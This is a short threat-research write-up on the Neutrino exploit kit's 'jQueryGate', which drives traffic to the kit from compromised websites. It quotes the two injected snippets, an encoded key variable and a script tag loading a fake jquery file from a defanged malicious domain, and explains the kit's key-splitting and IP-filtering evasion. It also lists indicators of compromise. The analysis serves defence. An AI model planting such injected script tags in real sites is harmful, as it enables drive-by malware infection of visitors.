In the cybercrime landscape, Exploit Kits (EKs) are the tool of choice to infect endpoints by exploiting software vulnerabilities. However, a critical component EKs rely on is web traffic, which must be directed towards them.
There are two primary sources of traffic to an exploit kit:
- malvertising: malicious ad banners displayed on legitimate websites
- compromised websites: malicious code injected into sites (iframes, 302 redirects, etc)
One of the most popular exploit kits at the moment, Neutrino EK, has several different gates:
Compromised websites are injected with two different code snippets:
<script>var MjUzNjI4OTU2Mw="Mjg\u0034MT\u0049wN\u006ak3\u004dw";</script>A fake jQuery.js file:
<script src="http://answerdash[.]tech/lib/assets/chosen.jquery.js"></script>We noted that if you browsed to the fake jquery file directly, you would be served a different (benign) copy:
The variable is in fact a key which is necessary for the JS file to get decoded, and while it could have been defined within the JS script, it was stored on the compromised site instead. This may be to make it harder for researchers that analyze the standalone JS, without the key parameter.
Some last noteworthy points about the jQueryGate is the fact that there is heavy IP filtering in place (one shot per residential IP) to prevent replays of the drive-by download attack. Additionally, the domains involved appear to be using newer TLDs (i.e. .tech, .press).
Indicators of Compromise:
Source code: pastebin.com/raw/8zqXBxhB